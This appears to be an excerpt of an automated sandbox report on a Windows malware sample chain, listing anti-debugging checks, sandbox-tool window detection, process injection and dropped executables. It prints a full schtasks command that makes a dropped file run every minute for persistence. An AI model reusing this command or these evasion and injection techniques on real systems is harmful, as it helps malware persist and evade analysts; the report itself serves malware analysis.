Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Thread information set: HideFromDebugger	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Thread information set: HideFromDebugger	Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: regmonclass
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	File opened: SIWVID

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process queried: DebugPort

Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe

Code function: 13_2_04D205B6 rdtsc

13_2_04D205B6

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe

Code function: 8_2_0086BCE0 LdrInitializeThunk,

8_2_0086BCE0

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00F9A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_00F9A1A5

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF2F1D GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,SetCurrentDirectoryA,

0_2_00CF2F1D

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F9DB60 mov eax, dword ptr fs:[00000030h]	2_2_00F9DB60
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00FA5FF2 mov eax, dword ptr fs:[00000030h]	2_2_00FA5FF2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_0049DB60 mov eax, dword ptr fs:[00000030h]	6_2_0049DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004A5FF2 mov eax, dword ptr fs:[00000030h]	6_2_004A5FF2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_0049DB60 mov eax, dword ptr fs:[00000030h]	14_2_0049DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004A5FF2 mov eax, dword ptr fs:[00000030h]	14_2_004A5FF2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0049DB60 mov eax, dword ptr fs:[00000030h]	15_2_0049DB60
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004A5FF2 mov eax, dword ptr fs:[00000030h]	15_2_004A5FF2

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00FB04F2 GetProcessHeap,

2_2_00FB04F2

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF6CF0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_00CF6CF0
Source: C:\Users\user\Desktop\S2W2ftXM2b.exe	Code function: 0_2_00CF6F40 SetUnhandledExceptionFilter,	0_2_00CF6F40
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F9A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F9A1A5
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F9A308 SetUnhandledExceptionFilter,	2_2_00F9A308
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F998B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_00F998B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: 2_2_00F9EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_00F9EB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_0049A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0049A1A5
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_0049A308 SetUnhandledExceptionFilter,	6_2_0049A308
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_0049EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_0049EB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 6_2_004998B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_004998B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_0049A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0049A1A5
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_0049A308 SetUnhandledExceptionFilter,	14_2_0049A308
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_0049EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	14_2_0049EB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 14_2_004998B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	14_2_004998B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0049A1A5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0049A1A5
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0049A308 SetUnhandledExceptionFilter,	15_2_0049A308
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_0049EB6D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	15_2_0049EB6D
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: 15_2_004998B8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	15_2_004998B8

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe

Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Contains functionality to inject code into remote processes

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00F78070 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,

2_2_00F78070

Injects a PE file into a foreign processes

Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Memory written: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Memory written: C:\Users\user\AppData\Roaming\d0HNrLB.exe base: 400000 value starts with: 4D5A

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\KI2Q1PIQVVVTNGJPW8.exe	Process created: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe "C:\Users\user~1\AppData\Local\Temp\bb556cff4a\rapes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe "C:\Users\user~1\AppData\Local\Temp\10062780101\JqGBbm7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe "C:\Users\user~1\AppData\Local\Temp\10074170101\khykuQw.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe "C:\Users\user~1\AppData\Local\Temp\10075800101\zY9sqWs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe "C:\Users\user~1\AppData\Local\Temp\10077160101\bPDDW9F.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Process created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Process created: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe "C:\Users\user~1\AppData\Local\Temp\10068150101\3Mv6i65.exe"
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe "C:\Users\user~1\AppData\Local\Temp\10077440101\d0HNrLB.exe"
Source: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "d0HNrLB" /tr "C:\Users\user\AppData\Roaming\d0HNrLB.exe"
Source: C:\Users\user\AppData\Roaming\d0HNrLB.exe	Process created: C:\Users\user\AppData\Roaming\d0HNrLB.exe "C:\Users\user\AppData\Roaming\d0HNrLB.exe"

Source: C:\Users\user\Desktop\S2W2ftXM2b.exe

Code function: 0_2_00CF17EE LoadLibraryA,GetProcAddress,AllocateAndInitializeSid,FreeSid,FreeLibrary,

0_2_00CF17EE

Source: 2X0520.exe, 2X0520.exe, 00000008.00000002.1528188667.0000000000A5B000.00000040.00000001.01000000.00000009.sdmp	Binary or memory string: Program Manager
Source: KI2Q1PIQVVVTNGJPW8.exe, KI2Q1PIQVVVTNGJPW8.exe, 0000000D.00000002.1583103203.000000000063C000.00000040.00000001.01000000.0000000B.sdmp	Binary or memory string: @Program Manager
Source: JqGBbm7.exe, JqGBbm7.exe, 00000013.00000002.2399512894.00000000011BB000.00000040.00000001.01000000.0000000E.sdmp	Binary or memory string: /Program Manager

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe

Code function: 2_2_00F9A38F cpuid

2_2_00F9A38F

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: EnumSystemLocalesW,	2_2_00FB20C8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: EnumSystemLocalesW,	2_2_00FA81BC
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: EnumSystemLocalesW,	2_2_00FB21AE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: EnumSystemLocalesW,	2_2_00FB2113
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00FB2239
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetLocaleInfoW,	2_2_00FB248C
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_00FB25B2
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetLocaleInfoW,	2_2_00FA86DE
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetLocaleInfoW,	2_2_00FB26B8
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00FB2787
Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\1s89v4.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00FB1E26
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	6_2_004B20C8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	6_2_004B2113
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	6_2_004B21AE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	6_2_004A81BC
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	6_2_004B2239
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	6_2_004B248C
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_004B25B2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	6_2_004A86DE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	6_2_004B26B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	6_2_004B2787
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	6_2_004B1E26
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	14_2_004B20C8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	14_2_004B2113
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	14_2_004B21AE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	14_2_004A81BC
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	14_2_004B2239
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	14_2_004B248C
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	14_2_004B25B2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	14_2_004A86DE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	14_2_004B26B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	14_2_004B2787
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	14_2_004B1E26
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	15_2_004B2021
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	15_2_004B20C8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	15_2_004B2113
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	15_2_004B21AE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: EnumSystemLocalesW,	15_2_004A81BC
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	15_2_004B2239
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	15_2_004B248C
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	15_2_004B25B2
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	15_2_004A86DE
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetLocaleInfoW,	15_2_004B26B8
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	15_2_004B2787
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	15_2_004B1E26

Source: C:\Users\user\AppData\Local\Temp\IXP000.TMP\2X0520.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10074170101\khykuQw.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10075800101\zY9sqWs.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10077160101\bPDDW9F.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10077440101\d0HNrLB.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10062780101\JqGBbm7.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\_ctypes.pyd VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082 VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\10068150101\3Mv6i65.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI14082\base_library.zip VolumeInformation
